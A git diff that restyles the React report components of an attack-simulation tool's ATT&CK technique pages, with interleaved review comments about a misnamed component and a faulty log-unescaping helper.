{this.props.data.status === ScanStatus.USED ? : ""} ); diff --git a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1021.js b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1021.js index ce8688af1..e9b21d7f4 100644 --- a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1021.js +++ b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1021.js @@ -1,7 +1,7 @@ import React from 'react'; import '../../../styles/Collapse.scss' import ReactTable from "react-table"; -import { renderMachine, ScanStatus } from "./Helpers" +import {renderMachine, ScanStatus} from "./Helpers" class T1021 extends React.Component { @@ -13,12 +13,20 @@ class T1021 extends React.Component { static getServiceColumns() { return ([{ columns: [ - {Header: 'Machine', id: 'machine', accessor: x => renderMachine(x.machine), - style: { 'whiteSpace': 'unset' }, width: 160}, - {Header: 'Service', id: 'service', accessor: x => x.info.display_name, style: { 'whiteSpace': 'unset' }, width: 100}, - {Header: 'Valid account used', id: 'credentials', accessor: x => this.renderCreds(x.successful_creds), style: { 'whiteSpace': 'unset' }}, - ] - }])}; + { + Header: 'Machine', id: 'machine', accessor: x => renderMachine(x.machine), + style: {'whiteSpace': 'unset'}, width: 160 + }, + {Header: 'Service', id: 'service', accessor: x => x.info.display_name, style: {'whiteSpace': 'unset'}, width: 100}, + { + Header: 'Valid account used', + id: 'credentials', + accessor: x => this.renderCreds(x.successful_creds), + style: {'whiteSpace': 'unset'} + }, + ] + }]) + }; static renderCreds(creds) { return {creds.map(cred =>
{cred}
)}
diff --git a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1035.js b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1035.js index 7345ca497..b95b6bb45 100644 --- a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1035.js +++ b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1035.js @@ -1,7 +1,7 @@ import React from 'react'; import '../../../styles/Collapse.scss' import ReactTable from "react-table"; -import { getUsageColumns } from "./Helpers" +import {getUsageColumns} from "./Helpers" class T1035 extends React.Component { @@ -17,10 +17,10 @@ class T1035 extends React.Component {
{this.props.data.services.length !== 0 ? : ""} ); diff --git a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1041.js b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1041.js index 3d6b45d08..9749186fe 100644 --- a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1041.js +++ b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1041.js @@ -13,9 +13,11 @@ class T1041 extends React.Component { return ([{ Header: "Data exfiltration channels", columns: [ - {Header: 'Source', id: 'src', accessor: x => x.src, style: { 'whiteSpace': 'unset' }}, - {Header: 'Destination', id: 'dst', accessor: x => x.dst, style: { 'whiteSpace': 'unset' }} - ]}])}; + {Header: 'Source', id: 'src', accessor: x => x.src, style: {'whiteSpace': 'unset'}}, + {Header: 'Destination', id: 'dst', accessor: x => x.dst, style: {'whiteSpace': 'unset'}} + ] + }]) + }; render() { return ( @@ -24,10 +26,10 @@ class T1041 extends React.Component {
{this.props.data.status === ScanStatus.USED ? : ""} ); diff --git a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1059.js b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1059.js index 4651f5c41..ba886b6c7 100644 --- a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1059.js +++ b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1059.js @@ -1,7 +1,7 @@ import React from 'react'; import '../../../styles/Collapse.scss' import ReactTable from "react-table"; -import { renderMachine, ScanStatus } from "./Helpers" +import {renderMachine, ScanStatus} from "./Helpers" class T1059 extends React.Component { @@ -14,11 +14,18 @@ class T1059 extends React.Component { return ([{ Header: 'Example commands used', columns: [ - {Header: 'Machine', id: 'machine', accessor: x => renderMachine(x.data.machine), style: { 'whiteSpace': 'unset'}, width: 160 }, - {Header: 'Approx. Time', id: 'time', accessor: x => x.data.info.finished, style: { 'whiteSpace': 'unset' }}, - {Header: 'Command', id: 'command', accessor: x => x.data.info.executed_cmds.cmd, style: { 'whiteSpace': 'unset' }}, - ] - }])}; + { + Header: 'Machine', + id: 'machine', + accessor: x => renderMachine(x.data.machine), + style: {'whiteSpace': 'unset'}, + width: 160 + }, + {Header: 'Approx. Time', id: 'time', accessor: x => x.data.info.finished, style: {'whiteSpace': 'unset'}}, + {Header: 'Command', id: 'command', accessor: x => x.data.info.executed_cmds.cmd, style: {'whiteSpace': 'unset'}}, + ] + }]) + }; render() { return ( @@ -27,10 +34,10 @@ class T1059 extends React.Component {
{this.props.data.status === ScanStatus.USED ? : ""} ); diff --git a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1064.js b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1064.js index f57abd4b8..27b099f82 100644 --- a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1064.js +++ b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1064.js @@ -1,7 +1,7 @@ import React from 'react'; import '../../../styles/Collapse.scss' import ReactTable from "react-table"; -import { getUsageColumns } from "./Helpers" +import {getUsageColumns} from "./Helpers" class T1064 extends React.Component { @@ -17,10 +17,10 @@ class T1064 extends React.Component {
{this.props.data.scripts.length !== 0 ? : ""} ); diff --git a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1075.js b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1075.js index 3cd12560b..db2bb943a 100644 --- a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1075.js +++ b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1075.js @@ -1,7 +1,7 @@ import React from 'react'; import '../../../styles/Collapse.scss' import ReactTable from "react-table"; -import { renderMachine, ScanStatus } from "./Helpers" +import {renderMachine, ScanStatus} from "./Helpers" class T1075 extends React.Component { @@ -11,10 +11,10 @@ class T1075 extends React.Component { this.props.data.successful_logins.forEach((login) => this.setLoginHashType(login)) } - setLoginHashType(login){ - if(login.attempts[0].ntlm_hash !== ""){ + setLoginHashType(login) { + if (login.attempts[0].ntlm_hash !== "") { login.attempts[0].hashType = 'NTLM'; - } else if(login.attempts[0].lm_hash !== ""){ + } else if (login.attempts[0].lm_hash !== "") { login.attempts[0].hashType = 'LM'; } } 
@@ -22,12 +22,13 @@ class T1075 extends React.Component { static getHashColumns() { return ([{ columns: [ - {Header: 'Machine', id: 'machine', accessor: x => renderMachine(x.machine), style: { 'whiteSpace': 'unset' }}, - {Header: 'Service', id: 'service', accessor: x => x.info.display_name, style: { 'whiteSpace': 'unset' }}, - {Header: 'Username', id: 'username', accessor: x => x.attempts[0].user, style: { 'whiteSpace': 'unset' }}, - {Header: 'Hash type', id: 'hash', accessor: x => x.attempts[0].hashType, style: { 'whiteSpace': 'unset' }}, - ] - }])}; + {Header: 'Machine', id: 'machine', accessor: x => renderMachine(x.machine), style: {'whiteSpace': 'unset'}}, + {Header: 'Service', id: 'service', accessor: x => x.info.display_name, style: {'whiteSpace': 'unset'}}, + {Header: 'Username', id: 'username', accessor: x => x.attempts[0].user, style: {'whiteSpace': 'unset'}}, + {Header: 'Hash type', id: 'hash', accessor: x => x.attempts[0].hashType, style: {'whiteSpace': 'unset'}}, + ] + }]) + }; render() { return ( @@ -36,10 +37,10 @@ class T1075 extends React.Component {
{this.props.data.status === ScanStatus.USED ? : ""} ); diff --git a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1082.js b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1082.js index 8570ab1b0..1e04f9da8 100644 --- a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1082.js +++ b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1082.js @@ -1,7 +1,7 @@ import React from 'react'; import '../../../styles/Collapse.scss' import ReactTable from "react-table"; -import { renderMachineFromSystemData, renderUsageFields, ScanStatus } from "./Helpers" +import {renderMachineFromSystemData, renderUsageFields, ScanStatus} from "./Helpers" class T1082 extends React.Component { @@ -13,10 +13,16 @@ class T1082 extends React.Component { static getSystemInfoColumns() { return ([{ columns: [ - {Header: 'Machine', id: 'machine', accessor: x => renderMachineFromSystemData(x.machine), style: { 'whiteSpace': 'unset' }}, - {Header: 'Gathered info', id: 'info', accessor: x => renderUsageFields(x.collections), style: { 'whiteSpace': 'unset' }}, - ] - }])}; + { + Header: 'Machine', + id: 'machine', + accessor: x => renderMachineFromSystemData(x.machine), + style: {'whiteSpace': 'unset'} + }, + {Header: 'Gathered info', id: 'info', accessor: x => renderUsageFields(x.collections), style: {'whiteSpace': 'unset'}}, + ] + }]) + }; render() { return ( @@ -25,10 +31,10 @@ class T1082 extends React.Component {
{this.props.data.status === ScanStatus.USED ? : ""} ); diff --git a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1086.js b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1086.js index db75d8dda..faeff7862 100644 --- a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1086.js +++ b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1086.js @@ -1,7 +1,7 @@ import React from 'react'; import '../../../styles/Collapse.scss' import ReactTable from "react-table"; -import { renderMachine, ScanStatus } from "./Helpers" +import {renderMachine, ScanStatus} from "./Helpers" class T1086 extends React.Component { @@ -14,11 +14,18 @@ class T1086 extends React.Component { return ([{ Header: 'Example Powershell commands used', columns: [ - {Header: 'Machine', id: 'machine', accessor: x => renderMachine(x.data[0].machine), style: { 'whiteSpace': 'unset'}, width: 160 }, - {Header: 'Approx. Time', id: 'time', accessor: x => x.data[0].info.finished, style: { 'whiteSpace': 'unset' }}, - {Header: 'Command', id: 'command', accessor: x => x.data[0].info.executed_cmds[0].cmd, style: { 'whiteSpace': 'unset' }}, - ] - }])}; + { + Header: 'Machine', + id: 'machine', + accessor: x => renderMachine(x.data[0].machine), + style: {'whiteSpace': 'unset'}, + width: 160 + }, + {Header: 'Approx. Time', id: 'time', accessor: x => x.data[0].info.finished, style: {'whiteSpace': 'unset'}}, + {Header: 'Command', id: 'command', accessor: x => x.data[0].info.executed_cmds[0].cmd, style: {'whiteSpace': 'unset'}}, + ] + }]) + }; render() { return ( @@ -27,10 +34,10 @@ class T1086 extends React.Component {
{this.props.data.status === ScanStatus.USED ? : ""} ); diff --git a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1090.js b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1090.js index 934e76694..8aa0de2c2 100644 --- a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1090.js +++ b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1090.js @@ -1,7 +1,7 @@ import React from 'react'; import '../../../styles/Collapse.scss' import ReactTable from "react-table"; -import { renderMachineFromSystemData, ScanStatus } from "./Helpers" +import {renderMachineFromSystemData, ScanStatus} from "./Helpers" class T1090 extends React.Component { @@ -13,10 +13,13 @@ class T1090 extends React.Component { static getProxyColumns() { return ([{ columns: [ - {Header: 'Machines', + { + Header: 'Machines', id: 'machine', accessor: x => renderMachineFromSystemData(x), - style: { 'whiteSpace': 'unset', textAlign: 'center' }}]}]) + style: {'whiteSpace': 'unset', textAlign: 'center'} + }] + }]) }; render() { @@ -26,10 +29,10 @@ class T1090 extends React.Component {
{this.props.data.status === ScanStatus.USED ? : ""} ); diff --git a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1105.js b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1105.js index 8acd48c4b..d1df0e9e6 100644 --- a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1105.js +++ b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1105.js @@ -1,7 +1,7 @@ import React from 'react'; import '../../../styles/Collapse.scss' import ReactTable from "react-table"; -import { ScanStatus } from "./Helpers" +import {ScanStatus} from "./Helpers" class T1105 extends React.Component { @@ -14,11 +14,12 @@ class T1105 extends React.Component { return ([{ Header: 'Files copied', columns: [ - {Header: 'Src. Machine', id: 'srcMachine', accessor: x => x.src, style: { 'whiteSpace': 'unset'}, width: 170 }, - {Header: 'Dst. Machine', id: 'dstMachine', accessor: x => x.dst, style: { 'whiteSpace': 'unset'}, width: 170}, - {Header: 'Filename', id: 'filename', accessor: x => x.filename, style: { 'whiteSpace': 'unset'}}, - ] - }])}; + {Header: 'Src. Machine', id: 'srcMachine', accessor: x => x.src, style: {'whiteSpace': 'unset'}, width: 170}, + {Header: 'Dst. Machine', id: 'dstMachine', accessor: x => x.dst, style: {'whiteSpace': 'unset'}, width: 170}, + {Header: 'Filename', id: 'filename', accessor: x => x.filename, style: {'whiteSpace': 'unset'}}, + ] + }]) + }; render() { return ( @@ -27,10 +28,10 @@ class T1105 extends React.Component {
{this.props.data.status !== ScanStatus.UNSCANNED ? : ""} ); diff --git a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1106.js b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1106.js index a3210b73c..febebb30d 100644 --- a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1106.js +++ b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1106.js @@ -1,7 +1,7 @@ import React from 'react'; import '../../../styles/Collapse.scss' import ReactTable from "react-table"; -import { getUsageColumns } from "./Helpers" +import {getUsageColumns} from "./Helpers" class T1106 extends React.Component { @@ -17,10 +17,10 @@ class T1106 extends React.Component {
{this.props.data.api_uses.length !== 0 ? : ""} ); diff --git a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1107.js b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1107.js index d80dc3f0e..faabf95a2 100644 --- a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1107.js +++ b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1107.js @@ -1,7 +1,7 @@ import React from 'react'; import '../../../styles/Collapse.scss' import ReactTable from "react-table"; -import { renderMachineFromSystemData, ScanStatus } from "./Helpers" +import {renderMachineFromSystemData, ScanStatus} from "./Helpers" class T1107 extends React.Component { @@ -10,8 +10,8 @@ class T1107 extends React.Component { super(props); } - static renderDelete(status){ - if(status === ScanStatus.USED){ + static renderDelete(status) { + if (status === ScanStatus.USED) { return Yes } else { return No @@ -21,11 +21,19 @@ class T1107 extends React.Component { static getDeletedFileColumns() { return ([{ columns: [ - {Header: 'Machine', id: 'machine', accessor: x => renderMachineFromSystemData(x._id.machine), style: { 'whiteSpace': 'unset' }}, - {Header: 'Path', id: 'path', accessor: x => x._id.path, style: { 'whiteSpace': 'unset' }}, - {Header: 'Deleted?', id: 'deleted', accessor: x => this.renderDelete(x._id.status), - style: { 'whiteSpace': 'unset' }, width: 160}] - }])}; + { + Header: 'Machine', + id: 'machine', + accessor: x => renderMachineFromSystemData(x._id.machine), + style: {'whiteSpace': 'unset'} + }, + {Header: 'Path', id: 'path', accessor: x => x._id.path, style: {'whiteSpace': 'unset'}}, + { + Header: 'Deleted?', id: 'deleted', accessor: x => this.renderDelete(x._id.status), + style: {'whiteSpace': 'unset'}, width: 160 + }] + }]) + }; render() { return ( @@ -34,10 +42,10 @@ class T1107 extends React.Component {
{this.props.data.deleted_files.length !== 0 ? : ""} ); diff --git a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1110.js b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1110.js index da9682da3..475e79fed 100644 --- a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1110.js +++ b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1110.js @@ -1,7 +1,7 @@ import React from 'react'; import '../../../styles/Collapse.scss' import ReactTable from "react-table"; -import { renderMachine, ScanStatus } from "./Helpers" +import {renderMachine, ScanStatus} from "./Helpers" class T1110 extends React.Component { 
@@ -13,15 +13,23 @@ class T1110 extends React.Component { static getServiceColumns() { return ([{ columns: [ - {Header: 'Machine', id: 'machine', accessor: x => renderMachine(x.machine), - style: { 'whiteSpace': 'unset' }, width: 160}, - {Header: 'Service', id: 'service', accessor: x => x.info.display_name, style: { 'whiteSpace': 'unset' }, width: 100}, - {Header: 'Started', id: 'started', accessor: x => x.info.started, style: { 'whiteSpace': 'unset' }}, - {Header: 'Finished', id: 'finished', accessor: x => x.info.finished, style: { 'whiteSpace': 'unset' }}, - {Header: 'Attempts', id: 'attempts', accessor: x => x.attempt_cnt, style: { 'whiteSpace': 'unset' }, width: 160}, - {Header: 'Successful credentials', id: 'credentials', accessor: x => this.renderCreds(x.successful_creds), style: { 'whiteSpace': 'unset' }}, - ] - }])}; + { + Header: 'Machine', id: 'machine', accessor: x => renderMachine(x.machine), + style: {'whiteSpace': 'unset'}, width: 160 + }, + {Header: 'Service', id: 'service', accessor: x => x.info.display_name, style: {'whiteSpace': 'unset'}, width: 100}, + {Header: 'Started', id: 'started', accessor: x => x.info.started, style: {'whiteSpace': 'unset'}}, + {Header: 'Finished', id: 'finished', accessor: x => x.info.finished, style: {'whiteSpace': 'unset'}}, + {Header: 'Attempts', id: 'attempts', accessor: x => x.attempt_cnt, style: {'whiteSpace': 'unset'}, width: 160}, + { + Header: 'Successful credentials', + id: 'credentials', + accessor: x => this.renderCreds(x.successful_creds), + style: {'whiteSpace': 'unset'} + }, + ] + }]) + }; static renderCreds(creds) { return {creds.map(cred =>
{cred}
)}
diff --git a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1129.js b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1129.js index 64db13f81..cd19be877 100644 --- a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1129.js +++ b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1129.js @@ -16,10 +16,10 @@ class T1129 extends React.Component {
{this.props.data.dlls.length !== 0 ? : ""} ); diff --git a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1145.js b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1145.js index 641602dc5..2383a0bcc 100644 --- a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1145.js +++ b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1145.js @@ -1,7 +1,7 @@ import React from 'react'; import '../../../styles/Collapse.scss' import ReactTable from "react-table"; -import { renderMachineFromSystemData, ScanStatus } from "./Helpers" +import {renderMachineFromSystemData, ScanStatus} from "./Helpers" class T1145 extends React.Component { @@ -10,11 +10,11 @@ class T1145 extends React.Component { super(props); } - static renderSSHKeys(keys){ + static renderSSHKeys(keys) { let output = []; - keys.forEach(function(keyInfo){ - output.push(
- SSH key pair used by {keyInfo['name']} user found in {keyInfo['home_dir']}
) + keys.forEach(function (keyInfo) { + output.push(
+ SSH key pair used by {keyInfo['name']} user found in {keyInfo['home_dir']}
) }); return (
{output}
); } @@ -22,16 +22,21 @@ class T1145 extends React.Component { static getKeysInfoColumns() { return ([{ columns: [ - {Header: 'Machine', + { + Header: 'Machine', id: 'machine', accessor: x => renderMachineFromSystemData(x.machine), - style: { 'whiteSpace': 'unset' }}, - {Header: 'Keys found', + style: {'whiteSpace': 'unset'} + }, + { + Header: 'Keys found', id: 'keys', accessor: x => T1145.renderSSHKeys(x.ssh_info), - style: { 'whiteSpace': 'unset' }}, - ] - }])}; + style: {'whiteSpace': 'unset'} + }, + ] + }]) + }; render() { return ( @@ -40,10 +45,10 @@ class T1145 extends React.Component {
{this.props.data.status === ScanStatus.USED ? : ""} ); diff --git a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1188.js b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1188.js index 31be117a9..acddac84a 100644 --- a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1188.js +++ b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1188.js @@ -1,7 +1,7 @@ import React from 'react'; import '../../../styles/Collapse.scss' import ReactTable from "react-table"; -import { renderMachineFromSystemData, ScanStatus } from "./Helpers" +import {renderMachineFromSystemData, ScanStatus} from "./Helpers" class T1188 extends React.Component { @@ -14,20 +14,27 @@ class T1188 extends React.Component { return ([{ Header: "Communications through multi-hop proxies", columns: [ - {Header: 'From', + { + Header: 'From', id: 'from', accessor: x => renderMachineFromSystemData(x.from), - style: { 'whiteSpace': 'unset' }}, - {Header: 'To', + style: {'whiteSpace': 'unset'} + }, + { + Header: 'To', id: 'to', accessor: x => renderMachineFromSystemData(x.to), - style: { 'whiteSpace': 'unset' }}, - {Header: 'Hops', + style: {'whiteSpace': 'unset'} + }, + { + Header: 'Hops', id: 'hops', accessor: x => x.count, - style: { 'whiteSpace': 'unset' }}, - ] - }])}; + style: {'whiteSpace': 'unset'} + }, + ] + }]) + }; render() { return ( @@ -36,10 +43,10 @@ class T1188 extends React.Component {
{this.props.data.status === ScanStatus.USED ? : ""} ); diff --git a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1197.js b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1197.js index 8dc655aee..d82f51e3a 100644 --- a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1197.js +++ b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1197.js @@ -1,37 +1,43 @@ import React from 'react'; import '../../../styles/Collapse.scss' import ReactTable from "react-table"; -import { renderMachine } from "./Helpers" +import {renderMachine} from "./Helpers" class T1210 extends React.Component { constructor(props) { super(props); - this.columns = [ {Header: 'Machine', - id: 'machine', accessor: x => renderMachine(x), - style: { 'whiteSpace': 'unset' }, - width: 200}, - {Header: 'Time', - id: 'time', accessor: x => x.time, - style: { 'whiteSpace': 'unset' }, - width: 170}, - {Header: 'Usage', - id: 'usage', accessor: x => x.usage, - style: { 'whiteSpace': 'unset' }} - ] + this.columns = [{ + Header: 'Machine', + id: 'machine', accessor: x => renderMachine(x), + style: {'whiteSpace': 'unset'}, + width: 200 + }, + { + Header: 'Time', + id: 'time', accessor: x => x.time, + style: {'whiteSpace': 'unset'}, + width: 170 + }, + { + Header: 'Usage', + id: 'usage', accessor: x => x.usage, + style: {'whiteSpace': 'unset'} + } + ] } - renderExploitedMachines(){ - if (this.props.data.bits_jobs.length === 0){ - return (
) + renderExploitedMachines() { + if (this.props.data.bits_jobs.length === 0) { + return (
) } else { return () + columns={this.columns} + data={this.props.data.bits_jobs} + showPagination={false} + defaultPageSize={this.props.data.bits_jobs.length} + />) } } diff --git a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1210.js b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1210.js index 9b6266efa..2a66d97bb 100644 --- a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1210.js +++ b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1210.js @@ -1,7 +1,7 @@ import React from 'react'; import '../../../styles/Collapse.scss' import ReactTable from "react-table"; -import { renderMachine } from "./Helpers" +import {renderMachine} from "./Helpers" class T1210 extends React.Component { 
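Review bot: The component in T1197.js is still declared as `class T1210 extends React.Component` (the context line just after the imports in this hunk), which duplicates the name of the real T1210 component in the sibling file and makes stack traces and the React devtools tree misleading. Since this commit already restyles the entire class body, rename it here: `class T1197 extends React.Component {`. The matching `export default` at the end of the file is outside the hunk and presumably needs the same rename.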
@@ -14,40 +14,52 @@ class T1210 extends React.Component { return ([{ Header: "Found services", columns: [ - {Header: 'Machine', id: 'machine', accessor: x => renderMachine(x.machine), - style: { 'whiteSpace': 'unset' }, width: 200}, - {Header: 'Time', id: 'time', accessor: x => x.time, style: { 'whiteSpace': 'unset' }}, - {Header: 'Port', id: 'port', accessor: x =>x.service.port, style: { 'whiteSpace': 'unset' }, width: 100}, - {Header: 'Service', id: 'service', accessor: x => x.service.display_name, style: { 'whiteSpace': 'unset' }} - ] - }])} + { + Header: 'Machine', id: 'machine', accessor: x => renderMachine(x.machine), + style: {'whiteSpace': 'unset'}, width: 200 + }, + {Header: 'Time', id: 'time', accessor: x => x.time, style: {'whiteSpace': 'unset'}}, + {Header: 'Port', id: 'port', accessor: x => x.service.port, style: {'whiteSpace': 'unset'}, width: 100}, + {Header: 'Service', id: 'service', accessor: x => x.service.display_name, style: {'whiteSpace': 'unset'}} + ] + }]) + } static getExploitColumns() { return ([{ Header: "Exploited services", columns: [ - {Header: 'Machine', id: 'machine', accessor: x => renderMachine(x.machine), - style: { 'whiteSpace': 'unset' }, width: 200}, - {Header: 'Time', id: 'time', accessor: x => x.time, style: { 'whiteSpace': 'unset' }}, - {Header: 'Port/url', id: 'port', accessor: x =>this.renderEndpoint(x.service), style: { 'whiteSpace': 'unset' }, - width: 170}, - {Header: 'Service', id: 'service', accessor: x => x.service.display_name, style: { 'whiteSpace': 'unset' }} - ] - }])}; + { + Header: 'Machine', id: 'machine', accessor: x => renderMachine(x.machine), + style: {'whiteSpace': 'unset'}, width: 200 + }, + {Header: 'Time', id: 'time', accessor: x => x.time, style: {'whiteSpace': 'unset'}}, + { + Header: 'Port/url', id: 'port', accessor: x => this.renderEndpoint(x.service), style: {'whiteSpace': 'unset'}, + width: 170 + }, + {Header: 'Service', id: 'service', accessor: x => x.service.display_name, style: {'whiteSpace': 
'unset'}} + ] + }]) + }; - static renderEndpoint(val){ + static renderEndpoint(val) { return ( {(val.vulnerable_urls.length !== 0 ? val.vulnerable_urls[0] : val.vulnerable_ports[0])} ) }; - static formatScanned(data){ + static formatScanned(data) { let result = []; - for(let service in data.machine.services){ - let scanned_service = {'machine': data.machine, - 'time': data.time, - 'service': {'port': [data.machine.services[service].port], - 'display_name': data.machine.services[service].display_name}}; + for (let service in data.machine.services) { + let scanned_service = { + 'machine': data.machine, + 'time': data.time, + 'service': { + 'port': [data.machine.services[service].port], + 'display_name': data.machine.services[service].display_name + } + }; result.push(scanned_service) } return result @@ -58,10 +70,10 @@ class T1210 extends React.Component {

) } @@ -71,10 +83,10 @@ class T1210 extends React.Component {

) } diff --git a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1222.js b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1222.js index 712512bcb..4162196a5 100644 --- a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1222.js +++ b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1222.js @@ -1,7 +1,7 @@ import React from 'react'; import '../../../styles/Collapse.scss' import ReactTable from "react-table"; -import { renderMachine, ScanStatus } from "./Helpers" +import {renderMachine, ScanStatus} from "./Helpers" class T1222 extends React.Component { @@ -14,10 +14,11 @@ class T1222 extends React.Component { return ([{ Header: "Permission modification commands", columns: [ - {Header: 'Machine', id: 'machine', accessor: x => renderMachine(x.machine), style: { 'whiteSpace': 'unset' }}, - {Header: 'Command', id: 'command', accessor: x => x.command, style: { 'whiteSpace': 'unset' }}, - ] - }])}; + {Header: 'Machine', id: 'machine', accessor: x => renderMachine(x.machine), style: {'whiteSpace': 'unset'}}, + {Header: 'Command', id: 'command', accessor: x => x.command, style: {'whiteSpace': 'unset'}}, + ] + }]) + }; render() { return ( @@ -26,10 +27,10 @@ class T1222 extends React.Component {
{this.props.data.status === ScanStatus.USED ? : ""}
); diff --git a/monkey/monkey_island/cc/ui/src/components/map/preview-pane/InfMapPreviewPane.js b/monkey/monkey_island/cc/ui/src/components/map/preview-pane/InfMapPreviewPane.js index e06043c20..06223bba1 100644 --- a/monkey/monkey_island/cc/ui/src/components/map/preview-pane/InfMapPreviewPane.js +++ b/monkey/monkey_island/cc/ui/src/components/map/preview-pane/InfMapPreviewPane.js @@ -84,14 +84,14 @@ class InfMapPreviewPaneComponent extends PreviewPaneComponent { unescapeLog(st) { return st.substr(1, st.length - 2) // remove quotation marks on beginning and end of string. - .replace(/\\n/g, "\n") - .replace(/\\r/g, "\r") - .replace(/\\t/g, "\t") - .replace(/\\b/g, "\b") - .replace(/\\f/g, "\f") - .replace(/\\"/g, '\"') - .replace(/\\'/g, "\'") - .replace(/\\&/g, "\&"); + .replace(/\\n/g, "\n") + .replace(/\\r/g, "\r") + .replace(/\\t/g, "\t") + .replace(/\\b/g, "\b") + .replace(/\\f/g, "\f") + .replace(/\\"/g, '\"') + .replace(/\\'/g, "\'") + .replace(/\\&/g, "\&"); } downloadLog(asset) { diff --git a/monkey/monkey_island/cc/ui/src/components/map/preview-pane/PreviewPane.js b/monkey/monkey_island/cc/ui/src/components/map/preview-pane/PreviewPane.js index 327d77061..3ef3ab76d 100644 --- a/monkey/monkey_island/cc/ui/src/components/map/preview-pane/PreviewPane.js +++ b/monkey/monkey_island/cc/ui/src/components/map/preview-pane/PreviewPane.js @@ -92,14 +92,14 @@ class PreviewPaneComponent extends AuthComponent { unescapeLog(st) { return st.substr(1, st.length - 2) // remove quotation marks on beginning and end of string. - .replace(/\\n/g, "\n") - .replace(/\\r/g, "\r") - .replace(/\\t/g, "\t") - .replace(/\\b/g, "\b") - .replace(/\\f/g, "\f") - .replace(/\\"/g, '\"') - .replace(/\\'/g, "\'") - .replace(/\\&/g, "\&"); + .replace(/\\n/g, "\n") + .replace(/\\r/g, "\r") + .replace(/\\t/g, "\t") + .replace(/\\b/g, "\b") + .replace(/\\f/g, "\f") + .replace(/\\"/g, '\"') + .replace(/\\'/g, "\'") + .replace(/\\&/g, "\&"); } downloadLog(asset) { 
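Review bot: `unescapeLog`, re-indented in this hunk, hand-rolls JSON string unescaping and is not a correct inverse of it: the chain never handles an escaped backslash (`\\\\`), so an escaped backslash followed by `n` in the log text becomes a backslash plus a real newline, and `st.substr(1, st.length - 2)` drops the first and last character even when the value is not actually quoted. If the log body is a JSON-encoded string, as the "remove quotation marks" comment implies, the whole method reduces to `return JSON.parse(st);`, which handles every escape and throws on malformed input instead of silently mangling it. The identical method is re-indented again in PreviewPane.js in the next hunk; one shared helper would keep the two from drifting apart.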
